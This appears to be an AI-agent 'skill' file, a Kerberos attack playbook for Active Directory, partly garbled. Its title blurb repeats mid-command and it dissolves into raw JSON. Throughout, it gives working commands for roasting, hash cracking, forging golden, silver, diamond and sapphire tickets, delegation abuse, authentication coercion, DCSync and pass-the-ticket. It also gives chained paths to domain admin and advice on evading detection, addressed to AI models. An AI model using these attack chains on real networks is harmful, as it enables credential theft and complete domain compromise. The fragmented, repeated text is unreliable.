SKILL: Kerberos Attack Playbook — Expert AD Attack Guide AI LOAD INSTRUCTION : Expert Kerberos attack techniques for AD environments. Covers AS-REP roasting, Kerberoasting, golden/silver/diamond/sapphire tickets, delegation attacks, pass-the-ticket, and overpass-the-hash. Base models miss ticket type distinctions, delegation chain nuances, and detection-evasion trade-offs. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-acl-abuse for ACL-based AD attacks often chained with Kerberos - active-directory-certificate-services for ADCS-based persistence (golden certificat…

-computer-pass 'P@ss123' -dc-ip DC_IP DOMAIN/user:password\n\n# 2. Set RBCD on target\nrbcd.py -delegate-from 'FAKE

SKILL: Kerberos Attack Playbook — Expert AD Attack Guide AI LOAD INSTRUCTION : Expert Kerberos attack techniques for AD environments. Covers AS-REP roasting, Kerberoasting, golden/silver/diamond/sapphire tickets, delegation attacks, pass-the-ticket, and overpass-the-hash. Base models miss ticket type distinctions, delegation chain nuances, and detection-evasion trade-offs. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-acl-abuse for ACL-based AD attacks often chained with Kerberos - active-directory-certificate-services for ADCS-based persistence (golden certificat…

-delegate-to 'TARGET

SKILL: Kerberos Attack Playbook — Expert AD Attack Guide AI LOAD INSTRUCTION : Expert Kerberos attack techniques for AD environments. Covers AS-REP roasting, Kerberoasting, golden/silver/diamond/sapphire tickets, delegation attacks, pass-the-ticket, and overpass-the-hash. Base models miss ticket type distinctions, delegation chain nuances, and detection-evasion trade-offs. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-acl-abuse for ACL-based AD attacks often chained with Kerberos - active-directory-certificate-services for ADCS-based persistence (golden certificat…

-dc-ip DC_IP -action write DOMAIN/user:password\n\n# 3. S4U2Self + S4U2Proxy from controlled account\ngetST.py -spn cifs/TARGET.DOMAIN.COM -impersonate administrator DOMAIN/'FAKE

SKILL: Kerberos Attack Playbook — Expert AD Attack Guide AI LOAD INSTRUCTION : Expert Kerberos attack techniques for AD environments. Covers AS-REP roasting, Kerberoasting, golden/silver/diamond/sapphire tickets, delegation attacks, pass-the-ticket, and overpass-the-hash. Base models miss ticket type distinctions, delegation chain nuances, and detection-evasion trade-offs. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-acl-abuse for ACL-based AD attacks often chained with Kerberos - active-directory-certificate-services for ADCS-based persistence (golden certificat…

:'P@ss123' -dc-ip DC_IP\n\n# 4. Use the ticket\nexport KRB5CCNAME=administrator.ccache\npsexec.py -k -no-pass DOMAIN/[email protected]\n```\n\n---\n\n## 6. PASS-THE-TICKET & OVERPASS-THE-HASH\n\n### Pass-the-Ticket\n\n```bash\n# Impacket — use .ccache ticket\nexport KRB5CCNAME=/path/to/ticket.ccache\npsexec.py -k -no-pass DOMAIN/[email protected]\n\n# Mimikatz — inject .kirbi ticket into session\nkerberos::ptt ticket.kirbi\n\n# Rubeus\nRubeus.exe ptt /ticket:base64_ticket_blob\n```\n\n### Overpass-the-Hash (Pass-the-Key)\n\nUse NTLM hash to request a Kerberos TGT → pure Kerberos authentication (avoids NTLM logging).\n\n```bash\n# Impacket\ngetTGT.py DOMAIN/user -hashes :NTLM_HASH -dc-ip DC_IP\nexport KRB5CCNAME=user.ccache\n\n# Rubeus (from Windows)\nRubeus.exe asktgt /user:administrator /rc4:NTLM_HASH /ptt\n\n# Mimikatz\nsekurlsa::pth /user:administrator /domain:DOMAIN.COM /ntlm:NTLM_HASH /run:cmd.exe\n```\n\n---\n\n## 7. KERBEROS DOUBLE HOP PROBLEM\n\nWhen authenticating via Kerberos across two hops (A → B → C), B cannot forward A's credentials to C by default.\n\n### Solutions\n\n| Method | How | Risk |\n|---|---|---|\n| CredSSP | Sends actual credentials to B | Credential exposure |\n| Unconstrained delegation on B | B stores A's TGT | Over-privileged |\n| Constrained delegation | B allowed to delegate to C | Preferred — scoped |\n| RBCD | C trusts B to delegate | Modern, flexible |\n| Invoke-Command nested | `-Credential` param in nested session | Exposes password in script |\n\n---\n\n## 8. KERBEROS ATTACK DECISION TREE\n\n```\nAD environment — targeting Kerberos\n│\n├── Have domain user creds?\n│ ├── Kerberoast → crack service account hashes (§3)\n│ ├── Enumerate users without preauth → AS-REP roast (§2)\n│ ├── Enumerate delegation → unconstrained/constrained/RBCD (§5)\n│ └── Enumerate SPNs for high-value accounts\n│\n├── Have service account hash?\n│ ├── Silver ticket for that service (§4)\n│ └── If constrained delegation → S4U2Proxy chain (§5)\n│\n├── Have krbtgt hash?\n│ ├── Golden ticket → any user, any service (§4)\n│ ├── Diamond ticket → stealthier forging (§4)\n│ └── Sapphire ticket → hardest to detect (§4)\n│\n├── Compromised host with unconstrained delegation?\n│ ├── Monitor for incoming TGTs (Rubeus monitor)\n│ ├── Coerce DC authentication (PrinterBug/PetitPotam)\n│ └── Capture DC TGT → DCSync\n│\n├── Can write to target's msDS-AllowedToActOnBehalfOfOtherIdentity?\n│ └── RBCD attack (§5) → create machine account + delegate\n│\n├── Have NTLM hash but need Kerberos auth?\n│ └── Overpass-the-Hash → request TGT (§6)\n│\n└── Have .kirbi / .ccache ticket?\n └── Pass-the-Ticket → use directly (§6)\n```\n---","attachment_filenames":["KERBEROS_ATTACK_CHAINS.md"],"attachments":[{"filename":"KERBEROS_ATTACK_CHAINS.md","content":"# Kerberos Multi-Step Attack Chains\n\n> **AI LOAD INSTRUCTION**: Load this for end-to-end Kerberos attack chains that combine multiple AD techniques. Assumes the main [SKILL.md](./SKILL.md) is already loaded for individual Kerberos attacks. Use when planning multi-step attack paths from initial foothold to domain admin.\n\n---\n\n## 1. CHAIN: KERBEROAST → CONSTRAINED DELEGATION → DOMAIN ADMIN\n\n### Scenario\nLow-privilege domain user → cracked service account → delegation abuse → DA.\n\n```\nStep 1: Kerberoast\n│ GetUserSPNs.py DOMAIN/lowpriv:password -dc-ip DC -request\n│ hashcat -m 13100 tgs.txt wordlist.txt\n│ → Cracked: svc_backup / P@ssw0rd2024\n│\nStep 2: Enumerate delegation\n│ findDelegation.py DOMAIN/svc_backup:P@ssw0rd2024 -dc-ip DC\n│ → svc_backup has constrained delegation to cifs/DC01.domain.com\n│\nStep 3: S4U2Self + S4U2Proxy\n│ getST.py -spn cifs/DC01.domain.com -impersonate administrator DOMAIN/svc_backup:P@ssw0rd2024\n│\nStep 4: Access DC as administrator\n│ export KRB5CCNAME=administrator.ccache\n│ secretsdump.py -k -no-pass DC01.domain.com\n│ → Domain hashes dumped\n```\n\n---\n\n## 2. CHAIN: RBCD + KERBEROS → LATERAL MOVEMENT\n\n### Scenario\nWrite access to a computer's `msDS-AllowedToActOnBehalfOfOtherIdentity` → RBCD → lateral to that host.\n\n```\nStep 1: Identify writable computer object\n│ (via BloodHound: GenericWrite on TARGET$)\n│\nStep 2: Create machine account\n│ addcomputer.py -computer-name 'EVIL

SKILL: Kerberos Attack Playbook — Expert AD Attack Guide AI LOAD INSTRUCTION : Expert Kerberos attack techniques for AD environments. Covers AS-REP roasting, Kerberoasting, golden/silver/diamond/sapphire tickets, delegation attacks, pass-the-ticket, and overpass-the-hash. Base models miss ticket type distinctions, delegation chain nuances, and detection-evasion trade-offs. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-acl-abuse for ACL-based AD attacks often chained with Kerberos - active-directory-certificate-services for ADCS-based persistence (golden certificat…

-computer-pass 'Passw0rd!' DOMAIN/user:pass -dc-ip DC\n│\nStep 3: Set RBCD\n│ rbcd.py -delegate-from 'EVIL

SKILL: Kerberos Attack Playbook — Expert AD Attack Guide AI LOAD INSTRUCTION : Expert Kerberos attack techniques for AD environments. Covers AS-REP roasting, Kerberoasting, golden/silver/diamond/sapphire tickets, delegation attacks, pass-the-ticket, and overpass-the-hash. Base models miss ticket type distinctions, delegation chain nuances, and detection-evasion trade-offs. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-acl-abuse for ACL-based AD attacks often chained with Kerberos - active-directory-certificate-services for ADCS-based persistence (golden certificat…

-delegate-to 'TARGET

SKILL: Kerberos Attack Playbook — Expert AD Attack Guide AI LOAD INSTRUCTION : Expert Kerberos attack techniques for AD environments. Covers AS-REP roasting, Kerberoasting, golden/silver/diamond/sapphire tickets, delegation attacks, pass-the-ticket, and overpass-the-hash. Base models miss ticket type distinctions, delegation chain nuances, and detection-evasion trade-offs. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-acl-abuse for ACL-based AD attacks often chained with Kerberos - active-directory-certificate-services for ADCS-based persistence (golden certificat…

-action write DOMAIN/user:pass -dc-ip DC\n│\nStep 4: S4U chain\n│ getST.py -spn cifs/TARGET.domain.com -impersonate administrator DOMAIN/'EVIL

SKILL: Kerberos Attack Playbook — Expert AD Attack Guide AI LOAD INSTRUCTION : Expert Kerberos attack techniques for AD environments. Covers AS-REP roasting, Kerberoasting, golden/silver/diamond/sapphire tickets, delegation attacks, pass-the-ticket, and overpass-the-hash. Base models miss ticket type distinctions, delegation chain nuances, and detection-evasion trade-offs. 0. RELATED ROUTING Before going deep, consider loading: - active-directory-acl-abuse for ACL-based AD attacks often chained with Kerberos - active-directory-certificate-services for ADCS-based persistence (golden certificat…

:'Passw0rd!' -dc-ip DC\n│\nStep 5: Use ticket\n│ export KRB5CCNAME=administrator.ccache\n│ psexec.py -k -no-pass TARGET.domain.com\n```\n\n---\n\n## 3. CHAIN: UNCONSTRAINED DELEGATION + PRINTERBUG → DCSYNC\n\n### Scenario\nCompromised host with unconstrained delegation → coerce DC → capture DC TGT → DCSync.\n\n```\nStep 1: Confirm unconstrained delegation\n│ Get-DomainComputer -Unconstrained (via PowerView)\n│ → WEBSRV01.domain.com has unconstrained delegation\n│\nStep 2: Start Rubeus monitor on WEBSRV01\n│ Rubeus.exe monitor /interval:5 /nowrap /targetuser:DC01$\n│\nStep 3: Coerce DC authentication\n│ # From any domain machine, trigger PrinterBug:\n│ SpoolSample.exe DC01.domain.com WEBSRV01.domain.com\n│ # Or PetitPotam:\n│ PetitPotam.py WEBSRV01.domain.com DC01.domain.com\n│\nStep 4: Capture DC01$ TGT from Rubeus output\n│ Rubeus.exe ptt /ticket:base64_DC01_TGT\n│\nStep 5: DCSync with DC machine ticket\n│ mimikatz # lsadump::dcsync /domain:domain.com /user:krbtgt\n│ → krbtgt hash obtained → golden ticket capability\n```\n\n---\n\n## 4. CHAIN: AS-REP ROAST → ACL ABUSE → DCSYNC\n\n### Scenario\nNo creds initially → AS-REP roast → cracked user has DCSync rights via ACL path.\n\n```\nStep 1: Enumerate users without preauth (no creds needed)\n│ GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip DC -format hashcat\n│ → $krb5asrep$23$svc_monitor@DOMAIN:...\n│\nStep 2: Crack AS-REP hash\n│ hashcat -m 18200 asrep.txt wordlist.txt\n│ → svc_monitor / Welcome2024!\n│\nStep 3: BloodHound enumeration\n│ bloodhound-python -d domain.com -u svc_monitor -p Welcome2024! -c all -dc DC01\n│ → svc_monitor has GenericAll on IT-ADMINS group\n│ → IT-ADMINS group has DCSync rights\n│\nStep 4: Add self to IT-ADMINS\n│ net rpc group addmem \"IT-ADMINS\" svc_monitor -U DOMAIN/svc_monitor -S DC01\n│\nStep 5: DCSync\n│ secretsdump.py DOMAIN/svc_monitor:Welcome2024!@DC01\n│ → All domain hashes\n```\n\n---\n\n## 5. CHAIN: TARGETED KERBEROAST VIA ACL\n\n### Scenario\nGenericWrite on a user → set SPN → kerberoast → crack password.\n\n```\nStep 1: Identify GenericWrite permission\n│ BloodHound: user \"lowpriv\" has GenericWrite on \"svc_admin\"\n│\nStep 2: Set SPN on target user (targeted kerberoasting)\n│ # PowerView\n│ Set-DomainObject -Identity svc_admin -Set @{serviceprincipalname='fake/service'}\n│ # Or Impacket\n│ addspn.py -u DOMAIN/lowpriv -p password -t svc_admin -s fake/service DC01\n│\nStep 3: Kerberoast the target\n│ GetUserSPNs.py DOMAIN/lowpriv:password -dc-ip DC01 -request-user svc_admin\n│\nStep 4: Crack and clean up\n│ hashcat -m 13100 tgs.txt wordlist.txt\n│ # Remove the fake SPN\n│ Set-DomainObject -Identity svc_admin -Clear serviceprincipalname\n```\n\n---\n\n## 6. CHAIN: GOLDEN TICKET → CROSS-DOMAIN ESCALATION\n\n### Scenario\nCompromised child domain → golden ticket with SID history → enterprise admin in parent domain.\n\n```\nStep 1: Obtain child domain krbtgt hash\n│ secretsdump.py CHILD/administrator@childDC -just-dc-user krbtgt\n│\nStep 2: Get parent domain SID and Enterprise Admins group RID\n│ lookupsid.py PARENT/user:pass@parentDC 0\n│ → Parent Domain SID: S-1-5-21-PARENT...\n│ → Enterprise Admins RID: 519\n│\nStep 3: Forge golden ticket with SID history (ExtraSIDs)\n│ ticketer.py -nthash KRBTGT_HASH \\\n│ -domain-sid S-1-5-21-CHILD... \\\n│ -domain CHILD.PARENT.COM \\\n│ -extra-sid S-1-5-21-PARENT...-519 \\\n│ administrator\n│\nStep 4: Access parent domain DC\n│ export KRB5CCNAME=administrator.ccache\n│ psexec.py -k -no-pass PARENT.COM/[email protected]\n```\n\n---\n\n## 7. CHAIN: SHADOW CREDENTIALS + KERBEROS\n\n### Scenario\nGenericWrite on user → Shadow Credentials → certificate-based auth → TGT.\n\n```\nStep 1: Identify GenericWrite on target user/computer\n│ BloodHound path analysis\n│\nStep 2: Add shadow credential (msDS-KeyCredentialLink)\n│ # Whisker (Windows)\n│ Whisker.exe add /target:svc_admin /domain:domain.com /dc:DC01\n│ → Certificate and device ID generated\n│\n│ # pyWhisker (Linux)\n│ pywhisker.py -d domain.com -u lowpriv -p password --target svc_admin --action add --dc-ip DC01\n│\nStep 3: Use certificate to get TGT (PKINIT)\n│ Rubeus.exe asktgt /user:svc_admin /certificate:cert.pfx /password:certpass /ptt\n│\n│ # Or with PKINITtools\n│ gettgtpkinit.py -cert-pfx cert.pfx -pfx-pass certpass DOMAIN/svc_admin tgt.ccache\n│\nStep 4: Use TGT for further attacks\n│ export KRB5CCNAME=tgt.ccache\n│ # Now act as svc_admin\n```\n\n---\n\n## 8. ATTACK CHAIN SELECTION GUIDE\n\n```\nWhat access do you have?\n│\n├── No domain creds\n│ ├── Username list available? → AS-REP Roast (Chain 4)\n│ └── Network access only? → NTLM relay → see ntlm-relay-coercion\n│\n├── Low-privilege domain user\n│ ├── Kerberoastable SPNs found? → Kerberoast chain (Chain 1)\n│ ├── GenericWrite on user? → Targeted Kerberoast (Chain 5) or Shadow Creds (Chain 7)\n│ ├── GenericWrite on computer? → RBCD (Chain 2)\n│ └── Host with unconstrained delegation? → PrinterBug chain (Chain 3)\n│\n├── Service account compromised\n│ ├── Has constrained delegation? → S4U chain (Chain 1)\n│ └── No delegation? → Silver ticket for specific service\n│\n├── Domain Admin in child domain\n│ └── Want parent domain? → Golden ticket + ExtraSIDs (Chain 6)\n│\n└── Have krbtgt hash\n ├── Golden ticket (basic persistence)\n ├── Diamond ticket (evasive persistence)\n └── Sapphire ticket (hardest to detect)\n```\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":7380,"content_sha256":"32bd31082daa7ae56291acde2b1d59e1199c041c5b35c6c8da19f63926db1ed5"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"SKILL: Kerberos Attack Playbook — Expert AD Attack Guide","type":"text"}]},{"type":"blockquote","content":[{"type":"paragraph","content":[{"text":"AI LOAD INSTRUCTION","type":"text","marks":[{"type":"strong"}]},{"text":": Expert Kerberos attack techniques for AD environments. Covers AS-REP roasting, Kerberoasting, golden/silver/diamond/sapphire tickets, delegation attacks, pass-the-ticket, and overpass-the-hash. Base models miss ticket type distinctions, delegation chain nuances, and detection-evasion trade-offs.","type":"text"}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"0. RELATED ROUTING","type":"text"}]},{"type":"paragraph","content":[{"text":"Before going deep, consider loading:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"active-directory-acl-abuse","type":"text","marks":[{"type":"link","attrs":{"href":"../active-directory-acl-abuse/SKILL.md","title":null}}]},{"text":" for ACL-based AD attacks often chained with Kerberos","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"active-directory-certificate-services","type":"text","marks":[{"type":"link","attrs":{"href":"../active-directory-certificate-services/SKILL.md","title":null}}]},{"text":" for ADCS-based persistence (golden certificate)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"ntlm-relay-coercion","type":"text","marks":[{"type":"link","attrs":{"href":"../ntlm-relay-coercion/SKILL.md","title":null}}]},{"text":" for NTLM relay attacks that complement Kerberos abuse","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"windows-lateral-movement","type":"text","marks":[{"type":"link","attrs":{"href":"../windows-lateral-movement/SKILL.md","title":null}}]},{"text":" after obtaining tickets for lateral movement","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Advanced Reference","type":"text"}]},{"type":"paragraph","content":[{"text":"Also load ","type":"text"},{"text":"KERBEROS_ATTACK_CHAINS.md","type":"text","marks":[{"type":"link","attrs":{"href":"./KERBEROS_ATTACK_CHAINS.md","title":null}}]},{"text":" when you need:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Multi-step attack chains combining Kerberos with ACL abuse, ADCS, and relay","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"End-to-end scenarios from foothold to domain admin","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Chained delegation attack flows","type":"text"}]}]}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"1. KERBEROS AUTHENTICATION PRIMER","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":""},"content":[{"text":"Client KDC (DC) Service\n │ │ │\n │── AS-REQ ────────→│ │ (1) Request TGT with user creds\n │←─ AS-REP ─────────│ │ (2) Receive TGT (encrypted with krbtgt hash)\n │ │ │\n │── TGS-REQ ───────→│ │ (3) Present TGT, request service ticket\n │←─ TGS-REP ────────│ │ (4) Receive TGS (encrypted with service hash)\n │ │ │\n │── AP-REQ ─────────────────────────────→│ (5) Present TGS to service\n │←─ AP-REP ──────────────────────────────│ (6) Mutual auth (optional)","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"2. AS-REP ROASTING","type":"text"}]},{"type":"paragraph","content":[{"text":"Users with \"Do not require Kerberos preauthentication\" can be queried for AS-REP without knowing their password.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Enumerate Vulnerable Users","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Impacket — from Linux\nGetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip DC_IP -format hashcat -outputfile asrep.txt\n\n# Impacket — with domain creds (enumerate automatically)\nGetNPUsers.py DOMAIN/user:password -dc-ip DC_IP -request\n\n# Rubeus — from Windows (domain-joined)\nRubeus.exe asreproast /format:hashcat /outfile:asrep.txt\n\n# PowerView — enumerate users\nGet-DomainUser -PreauthNotRequired | Select-Object samaccountname","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Crack AS-REP Hash","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Hashcat mode 18200\nhashcat -m 18200 asrep.txt rockyou.txt --rules-file best64.rule\n\n# John\njohn asrep.txt --wordlist=rockyou.txt","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"3. KERBEROASTING","type":"text"}]},{"type":"paragraph","content":[{"text":"Any domain user can request TGS for accounts with SPNs. The TGS is encrypted with the service account's NTLM hash.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Request Service Tickets","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Impacket\nGetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP -request -outputfile tgs.txt\n\n# Rubeus (from Windows)\nRubeus.exe kerberoast /outfile:tgs.txt\n\n# Rubeus — target specific SPN / high-value accounts\nRubeus.exe kerberoast /user:svc_sql /outfile:tgs_sql.txt\n\n# PowerView + manual request\nGet-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname\nAdd-Type -AssemblyName System.IdentityModel\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList \"MSSQLSvc/db.domain.com\"","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Crack TGS Hash","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Hashcat mode 13100 (RC4) or 19700 (AES)\nhashcat -m 13100 tgs.txt rockyou.txt --rules-file best64.rule\n\n# RC4 tickets crack much faster than AES256 — target RC4 if possible\n# Rubeus: /tgtdeleg forces RC4 on some configs\nRubeus.exe kerberoast /tgtdeleg","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"4. TICKET FORGING — GOLDEN, SILVER, DIAMOND, SAPPHIRE","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Golden Ticket","type":"text"}]},{"type":"paragraph","content":[{"text":"Forge TGT using the ","type":"text"},{"text":"krbtgt","type":"text","marks":[{"type":"code_inline"}]},{"text":" hash → impersonate any user, including non-existent ones.","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Impacket — forge golden ticket\nticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain DOMAIN.COM administrator\n\n# Mimikatz\nkerberos::golden /user:administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /krbtgt:KRBTGT_HASH /ptt\n\n# Rubeus\nRubeus.exe golden /rc4:KRBTGT_HASH /user:administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /ptt","type":"text"}]},{"type":"paragraph","content":[{"text":"Prerequisites","type":"text","marks":[{"type":"strong"}]},{"text":": krbtgt NTLM hash (from DCSync or NTDS.dit) ","type":"text"},{"text":"Persistence","type":"text","marks":[{"type":"strong"}]},{"text":": Valid until krbtgt password is changed ","type":"text"},{"text":"twice","type":"text","marks":[{"type":"strong"}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Silver Ticket","type":"text"}]},{"type":"paragraph","content":[{"text":"Forge TGS using the service account's hash → access specific service only, no KDC interaction.","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Impacket — forge silver ticket for CIFS (file share)\nticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-... -domain DOMAIN.COM -spn cifs/target.domain.com administrator\n\n# Mimikatz\nkerberos::golden /user:administrator /domain:DOMAIN.COM /sid:S-1-5-21-... /target:target.domain.com /service:cifs /rc4:SERVICE_HASH /ptt","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Target Service","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"SPN Format","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Use Case","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"File shares","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"cifs/host","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Access SMB shares","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"WinRM","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"http/host","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Remote PowerShell","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"LDAP","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"ldap/dc","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"DCSync-like queries","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"MSSQL","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"MSSQLSvc/host:1433","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Database access","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Exchange","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"http/mail.domain.com","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Mailbox access","type":"text"}]}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Diamond Ticket","type":"text"}]},{"type":"paragraph","content":[{"text":"Modify a legitimately issued TGT → harder to detect than golden ticket.","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Rubeus — request real TGT then modify PAC\nRubeus.exe diamond /krbkey:KRBTGT_AES256 /user:administrator /domain:DOMAIN.COM /dc:DC01.DOMAIN.COM /ticketuser:targetadmin /ticketuserid:500 /groups:512 /ptt","type":"text"}]},{"type":"paragraph","content":[{"text":"Advantage","type":"text","marks":[{"type":"strong"}]},{"text":": The ticket's metadata (timestamps, enc type) matches a real TGT issuance.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Sapphire Ticket","type":"text"}]},{"type":"paragraph","content":[{"text":"Uses S4U2Self to get a real PAC for the target user, then embeds it in a forged ticket.","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Rubeus\nRubeus.exe diamond /krbkey:KRBTGT_AES256 /ticketuser:administrator /ticketuserid:500 /groups:512 /tgtdeleg /ptt","type":"text"}]},{"type":"paragraph","content":[{"text":"Advantage","type":"text","marks":[{"type":"strong"}]},{"text":": PAC is a genuine copy from KDC, making detection extremely difficult.","type":"text"}]},{"type":"hr","attrs":{"markup":"---"}},{"type":"heading","attrs":{"level":2},"content":[{"text":"5. DELEGATION ATTACKS","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Unconstrained Delegation","type":"text"}]},{"type":"paragraph","content":[{"text":"Hosts with unconstrained delegation store user TGTs in memory.","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Enumerate (PowerView)\nGet-DomainComputer -Unconstrained | Select-Object dnshostname\n\n# Coerce admin authentication → capture TGT (Rubeus monitor mode)\nRubeus.exe monitor /interval:5 /nowrap\n\n# Trigger via PrinterBug / PetitPotam → DC authenticates → TGT captured\nSpoolSample.exe DC01.domain.com COMPROMISED_HOST.domain.com","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Constrained Delegation (S4U2Proxy)","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Enumerate\nGet-DomainComputer -TrustedToAuth | Select-Object dnshostname,msds-allowedtodelegateto\n\n# S4U2Self + S4U2Proxy → get TGS for allowed service as any user\ngetST.py -spn cifs/target.domain.com -impersonate administrator DOMAIN/svc_account:password -dc-ip DC_IP\n\n# Rubeus\nRubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/target.domain.com /ptt","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Resource-Based Constrained Delegation (RBCD)","type":"text"}]},{"type":"paragraph","content":[{"text":"Requires write access to ","type":"text"},{"text":"msDS-AllowedToActOnBehalfOfOtherIdentity","type":"text","marks":[{"type":"code_inline"}]},{"text":" on the target.","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# 1. Create or control a computer account (MAQ > 0)\naddcomputer.py -computer-name 'FAKE

